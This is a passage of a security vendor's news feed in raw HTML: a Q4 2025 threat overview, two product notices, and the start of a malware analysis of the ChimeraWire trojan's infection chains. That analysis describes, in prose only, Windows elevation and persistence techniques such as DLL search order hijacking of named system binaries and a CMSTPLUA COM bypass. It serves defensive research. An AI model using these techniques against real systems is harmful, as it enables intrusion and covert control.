        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/03_encoder_requests_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;The most common encoders of Q4 2025:&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 24.90% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 4.21% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.29750&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 3.42% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.26996&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.26996&lt;/b&gt;&lt;/a&gt; — 2.68% of user requests&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.30356&lt;/b&gt; — 0.38% of user requests&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Network fraud&lt;/h3&gt;

&lt;p&gt;Over the course of Q4 2025, Doctor Web’s Internet analysts observed the emergence of new fake marketplace websites. Fraudsters, purporting to act on behalf of online trading platforms, offer potential victims the opportunity to play a carousel-type game (similar to roulette) with the chance of winning a prize. After several attempts, the user “gets lucky”, but to receive the prize, they are supposedly required to pay first for the shipping, then insurance, some taxes, etc. In some cases, the victim is told that the item in question is allegedly unavailable and is offered the chance to exchange it for money. If the user agrees, they are again asked to make further payments in the form of insurance, account activation fees, etc.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/04_fake_market_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/04_fake_market_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Example of a fake marketplace website offering a “prize drawing”&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;More Internet resources on which scammers sell non-existent theater tickets were added to our unwanted and malicious websites database. Such sites offer victims the chance to attend popular theatrical performances, often at attractive prices. However, after victims pay, they do not get the tickets and have essentially given their money away to the fraudsters.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/05_fake_bilet_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/05_fake_bilet_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;One of the fraudulent sites that sells non-existent theater tickets&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Other sites that imitate the websites of private cinemas and offer users a chance to buy movie tickets have also been detected. Victims do not receive any tickets after paying for them on such sites.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/06_fake_cinema_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/06_fake_cinema_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;The fake website of a private cinema&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Our specialists detected several phishing web resources, some of which were fake sites of the Steam platform. Malicious actors used them to obtain user account data by asking potential victims to provide a login and password for authentication.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/07_fake_steam_login_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/07_fake_steam_login_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A phishing website that imitates the real Steam Internet portal and asks potential victim to log into their account&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;In addition, scammers again lured potential victims into non-existent investment projects. One of the detected sites invited Russian-speaking users living in America to invest $250 in a project called &lt;em&gt;Federal Invest&lt;/em&gt; with the chance to “make up to 90,000 dollars in 3 months”. This project was allegedly created with the participation of Donald Trump.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/08_fake_invest_rus_amer_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/08_fake_invest_rus_amer_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A fraudulent site offering the chance to join a “profitable investment project”&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Another website claimed that Uzbek users can achieve an income of at least 15,000,000 Uzbek soums within the first month of joining the advertised project, which is allegedly related to a large holding company.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/09_fake_usm_q4_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/review_common_q4/09_fake_usm_q4_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A fraudulent website promising residents of Uzbekistan some large profits by joining the “investment project”&lt;/em&gt;&lt;/p&gt;

&lt;div class="notrecommend"&gt;
    &lt;a href="http://antifraud.drweb.com/dangerous_urls/"&gt;Find out more about Dr.Web non-recommended sites&lt;/a&gt;
&lt;/div&gt;

&lt;h3&gt;Malicious and unwanted programs for mobile devices&lt;/h3&gt;

&lt;p&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, in Q4 2025, the ad-displaying trojans &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; remained the most common Android threats, despite a decline in their activity. Malicious programs that belong to the &lt;b&gt;Android.Siggen&lt;/b&gt; family and have various functionality rose to third place. Over the course of the last three months, banking trojan activity increased, with the &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; family showing the greatest growth.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Program.CloudInject&amp;lng=en"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt; apps, modified via the CloudInject cloud service, were the most common unwanted software. Among the potentially dangerous programs, or riskware, the most active were &lt;b&gt;Tool.NPMod&lt;/b&gt; apps, which had been modified using the NP Manager utility. The most commonly detected adware programs were &lt;a href="https://vms.drweb.com/search/?q=Adware.Adpush&amp;lng=en"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt; modules that developers embed into Android apps.&lt;/p&gt;

&lt;p&gt;In October, Doctor Web released a &lt;a href="https://news.drweb.com/show/?i=15076&amp;lng=en" target="_blank"&gt;report&lt;/a&gt; on &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, a dangerous backdoor that threat actors embedded into Telegram X messenger modifications. This malware steals confidential information and allows the attackers to control both the victim's account and the messenger itself by changing its operating logic.&lt;/p&gt;

&lt;p&gt;During the fourth quarter, our virus analysts discovered new threats on Google Play, including &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; trojans, which subscribe users to paid services, and &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; malicious apps, which are used for fraudulent purposes.&lt;/p&gt;

&lt;p&gt;The following Q4 2025 events involving mobile malware are the most noteworthy:&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;Adware trojans remained the most common Android threats.&lt;/li&gt;
    &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; banking trojan activity increased.&lt;/li&gt;
    &lt;li&gt;The dangerous backdoor &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; was found in third-party Telegram X messenger mods.&lt;/li&gt;
    &lt;li&gt;New malicious programs emerged on Google Play.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To find out more about the security-threat landscape for mobile devices in Q4 2025, read our &lt;a href="https://news.drweb.com/show/?i=15101&amp;lng=en" target="_blank"&gt;special overview&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15095&amp;lng=en</guid><title>We’ve updated Dr.Web FixIt!’s End User License Agreement!</title><link>https://news.drweb.com/show/?i=15095&amp;lng=en&amp;c=5</link><pubDate>Mon, 29 Dec 2025 13:33:13 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Dr.Web FixIt!’s End User License Agreement has been updated. The latest EULA version is available at &lt;a href="https://license.drweb.com/agreement"&gt;https://license.drweb.com/agreement&lt;/a&gt;.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Dr.Web FixIt! allows information security experts to conduct in-depth analyses of Windows PCs and servers remotely, neutralise identified threats, and resolve potential vulnerabilities. It is distinguished by its ability to detect brand-new malware, including malicious programs that perpetrators use in targeted attacks and that can’t be identified by other cybersecurity tools.&lt;/p&gt;&lt;p&gt;Dr.Web FixIt! is primarily designed for information security professionals tasked with monitoring IT infrastructures and analysing cybersecurity incidents. However, even if a company doesn't employ an actual SOC team, the solution can still be used to identify threats on desktops, laptops and/or servers, and eliminate them.&lt;br&gt;If necessary, our experts will help you analyse the data gathered by Dr.Web FixIt! To get additional assistance and expertise from Doctor Web, you will need to purchase an expert support certificate.&lt;/p&gt;&lt;p&gt;You can purchase a Dr.Web FixIt! license from Doctor Web's &lt;a href="https://partners.drweb.com/find_partner/?lng=en"&gt;partners&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15094&amp;lng=en</guid><title>A major centralised administration server update for Dr.Web Enterprise Security Suite and Dr.Web Industrial</title><link>https://news.drweb.com/show/?i=15094&amp;lng=en&amp;c=5</link><pubDate>Fri, 12 Dec 2025 11:13:26 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Doctor Web is rolling out a major server component update for Dr.Web Enterprise Security Suite and Dr.Web Industrial 13.0.1.202511120 that will become available on December 15, 2025. The biggest change being introduced is for the Application Control component to further improve the security of protected devices.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;The update package will also deliver other tweaks and feature upgrades. Those include additional functional analysis criteria for Dr.Web Enterprise Security Suite and Dr.Web Industrial:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;In the “Application launch” category, Dr.Web can be set to stop office suite programs and mail clients from creating child processes. This can reduce the risk of infection via malicious documents and emails without interfering with the user experience.&lt;/li&gt;&lt;li&gt;In the “Launch of script interpreters” category, new rules are available to prevent scripts from being run from office suite apps and email clients and to block certain AutoIt, JavaScript and Python scripts. These restrictions will protect systems from cyberattacks that leverage script interpreters and help prevent dubious automation routines from being created.&lt;/li&gt;&lt;li&gt;The “Driver loading” category can now be used to prevent non-WHQL drivers from being installed. 
This option ensures that unsigned modules can't be used and potentially dangerous code won't be loaded into the kernel.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;The updated set of rules provides cybersecurity administrators with additional flexible tools for preventing malicious activity and increasing their infrastructure’s resilience in the face of modern threats.&lt;br&gt;The update also addresses a number of identified issues, which include:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;A Dr.Web server update error that could occur in systems with limited CPU and memory capacity.&lt;/li&gt;&lt;li&gt;An issue preventing the repository product “Content filter databases for UNIX” from being updated if the “Update only bases” option was enabled in the Control Center’s Update restrictions section.&lt;/li&gt;&lt;li&gt;Possible interference with routine DNS response cache updating.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;A detailed changelog is available &lt;a href="https://f2.drweb.com/get+meta+file/?k=4f637d7902fe78c8169021c2e3dcf8d4&amp;amp;sdl=en&amp;amp;sdf=t"&gt;here&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15090&amp;lng=en</guid><title>Bellerophon could never have imagined. The ChimeraWire trojan boosts website popularity by skillfully pretending to be human</title><link>https://news.drweb.com/show/?i=15090&amp;lng=en&amp;c=5</link><pubDate>Mon, 08 Dec 2025 05:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center justify-center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/ChimeraWire_en_pdf.pdf" class='btn'&gt;Download PDF&lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;&lt;b&gt;December 8, 2025&lt;/b&gt;&lt;/p&gt;

&lt;h3&gt;Introduction&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;&lt;newslead&gt;While analyzing one of the affiliate programs, Doctor Web’s experts discovered a unique piece of malware with clicker functionality and dubbed it &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;. This malware targets computers running Microsoft Windows and is based on the open-source projects &lt;a href="https://github.com/sohaha/zlsgo" target="_blank"&gt;zlsgo&lt;/a&gt; and &lt;a href="https://go-rod.github.io/" target="_blank"&gt;Rod&lt;/a&gt; for automated website and web application management.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; allows cybercriminals to simulate user actions and boost the behavioral factor of websites by artificially increasing their rankings in search engine results. For this, the malicious app searches target Internet resources in the Google and Bing search engines and then loads them. It also imitates user actions by clicking links on the loaded sites. The trojan performs all malicious actions in the Google Chrome web browser, which it downloads from a certain domain and then launches it in debug mode over the WebSocket protocol.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; gets onto computers with the help of several malicious downloaders. They utilize various privilege escalation techniques based on exploiting DLL Search Order Hijacking vulnerabilities, as well as anti-debugging techniques, in order to avoid detection. Our anti-virus laboratory has tracked at least 2 infection chains involving these malicious programs. In one of them, the malicious script &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; takes center stage. In the other—the centerpiece is &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;, whose operating principle is similar to that of &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;; in fact, this downloader is an alternative to the malicious script.&lt;/p&gt;

&lt;p&gt;In this study, we will cover the features of &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; and the malicious apps that deliver it to users’ devices.&lt;/p&gt;

&lt;h3&gt;First infection chain&lt;/h3&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/01_ChimeraWire_chain1_en.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/01_ChimeraWire_chain1_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A scheme that illustrates the first infection chain&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The first infection chain starts with &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54600&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;. This malware verifies whether it is operating in an artificial environment and terminates if it detects signs of a virtual machine or the debug mode. If no such signs exist, the trojan downloads the ZIP archive &lt;span class="string"&gt;python3.zip&lt;/span&gt; from the C2 server. It contains the malicious script &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; along with some additional files that it needs to operate, e.g., the malicious library &lt;span class="string"&gt;ISCSIEXE.dll&lt;/span&gt; (&lt;a href="https://vms.drweb.com/search/?q=Trojan.Starter.8377&amp;lng=en"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;). &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54600&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt; extracts the archive and runs the script. The latter is the second infection stage and represents the downloader that receives the next stage from the C2 server.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;’s behavior depends on the rights it has when executed. If the script is running without administrator privileges, it tries to obtain them. For this, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Starter.8377&amp;lng=en"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt; (extracted along with it) is copied to the directory &lt;span class="string"&gt;%LOCALAPPDATA%\Microsoft\WindowsApps&lt;/span&gt;. Moreover, a script &lt;span class="string"&gt;runs.vbs&lt;/span&gt; is created that will later be used to re-launch &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Next, &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; launches the system app &lt;span class="string"&gt;%SystemRoot%\SysWOW64\iscsicpl.exe&lt;/span&gt;. Because this app is affected by a DLL Search Order Hijacking class vulnerability, it automatically loads the trojan library &lt;span class="string"&gt;ISCSIEXE.dll&lt;/span&gt;, whose name matches the name of a legitimate Windows component.&lt;/p&gt;

&lt;p&gt;In turn, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Starter.8377&amp;lng=en"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt; runs the VBS script &lt;span class="string"&gt;runs.vbs&lt;/span&gt;, which then executes &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; again, but already as administrator.&lt;/p&gt;

&lt;p&gt;When executed with the necessary privileges, &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; downloads the password-protected archive &lt;span class="string"&gt;onedrive.zip&lt;/span&gt; from the C2 server. It contains the next infection stage, which is &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54318&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; (delivered as the library &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;), and the additional files required for it to operate (for instance, the legitimate app &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt;, which is part of the OneDrive software bundled with Windows and has a valid digital signature).&lt;/p&gt;

&lt;p&gt;After extracting the archive, &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; creates a Task Scheduler task for running the app &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; at system boot. Next, it launches this program. Because it has a DLL Search Order Hijacking vulnerability, the app automatically loads the malicious library &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;, whose name matches the name of a OneDrive software component.&lt;/p&gt;

&lt;p&gt;Once &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54318&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; gains control, it checks whether it has launched in an artificial environment. If it detects any sign that it is operating on a virtual machine or in debug mode, it terminates.&lt;/p&gt;

&lt;p&gt;If such signs are not detected, the trojan library tries to download the payload from the C2 server as well as the keys for its decryption.&lt;/p&gt;

&lt;p&gt;The decrypted payload is a ZLIB container with a shellcode and an executable file. After decrypting the container, &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54318&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt; tries to unpack it. If it fails to do so, the trojan deletes itself and terminates its active process. If the unpacking is successful, control is handed to the shellcode, whose task is to unzip the executable that comes with it. This file represents the final infection stage, which is the target trojan &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;Second infection chain&lt;/h3&gt;

&lt;p&gt;The second chain starts with the &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; malware. When launched, it checks whether it has administrator rights and tries to obtain them if it does not. To bypass the security system, the trojan uses the Masquerade PEB technique, disguising itself as the legitimate process &lt;span class="string"&gt;explorer.exe&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;Next, it patches the copy of the system library &lt;span class="string"&gt;%SystemRoot%\System32\ATL.dll&lt;/span&gt;. To do so, &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; reads its contents, adds a decrypted bytecode to it along with the path to the trojan’s file, and then saves the modified copy as the file &lt;span class="string"&gt;dropper&lt;/span&gt; in the same directory where it is located. After that, the trojan initializes the COM model objects of the Windows Shell for the service &lt;span class="string"&gt;%SystemRoot%\System32\wbem&lt;/span&gt; and the modified library. If this initialization is successful, &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; tries to obtain administrator rights by using the CMSTPLUA COM interface, exploiting a vulnerability that is typical for some old COM interfaces.&lt;/p&gt;

&lt;p&gt;If successful, the modified library &lt;span class="string"&gt;dropper&lt;/span&gt; is copied to the directory &lt;span class="string"&gt;%SystemRoot%\System32\wbem&lt;/span&gt; as the file &lt;span class="string"&gt;ATL.dll&lt;/span&gt;. After that, &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; launches the Windows Management Instrumentation snap-in &lt;span class="string"&gt;WmiMgmt.msc&lt;/span&gt;. As a result, a DLL Search Order Hijacking vulnerability is exploited in the system app &lt;span class="string"&gt;mmc.exe&lt;/span&gt;, which automatically loads the patched library &lt;span class="string"&gt;%SystemRoot%\System32\wbem\ATL.dll&lt;/span&gt;. In turn, this library launches &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; again, but this time with administrator rights.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/02_Trojan.DownLoader48.61444_noadmin_en.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/02_Trojan.DownLoader48.61444_noadmin_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A scheme illustrating &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;’s operation when administrator rights are not available&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;When running as administrator, &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; executes several PowerShell scripts that download the payload from the C2 server. One of the downloaded objects is the ZIP archive &lt;span class="string"&gt;one.zip&lt;/span&gt;. It contains the same files as the archive &lt;span class="string"&gt;onedrive.zip&lt;/span&gt; from the first infection chain (in particular, the legitimate app &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; and the malicious library &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;, which is &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54318&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; extracts the archive and creates a System Scheduler task for running &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; at system boot. The trojan also launches this app. Just like in the first chain, a DLL Search Order Hijacking vulnerability is exploited in &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; upon its launch, and the trojan library &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt; is automatically loaded. After that, the infection chain repeats the first scenario.&lt;/p&gt;

&lt;p&gt;At the same time, &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; also downloads a second ZIP archive, &lt;span class="string"&gt;two.zip&lt;/span&gt;. It contains the malicious script &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; (&lt;span class="string"&gt;update.py&lt;/span&gt;) as well as the files necessary for its execution. Among them is &lt;span class="string"&gt;Guardian.exe&lt;/span&gt;, which is a renamed copy of the Python interpreter &lt;span class="string"&gt;pythonw.exe&lt;/span&gt;.&lt;/p&gt;

&lt;p&gt;After extracting the archive, &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; creates a System Scheduler task for launching &lt;span class="string"&gt;Guardian.exe&lt;/span&gt; at system boot. Moreover, it directly executes the malicious script &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; through this app.&lt;/p&gt;

&lt;p&gt;By partially duplicating the first infection chain, threat actors apparently sought to increase the likelihood of successfully downloading &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; onto target systems.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/03_Trojan.DownLoader48.61444_admin_en.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/03_Trojan.DownLoader48.61444_admin_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A scheme illustrating &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; operating with administrator rights&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Trojan.ChimeraWire&lt;/h3&gt;

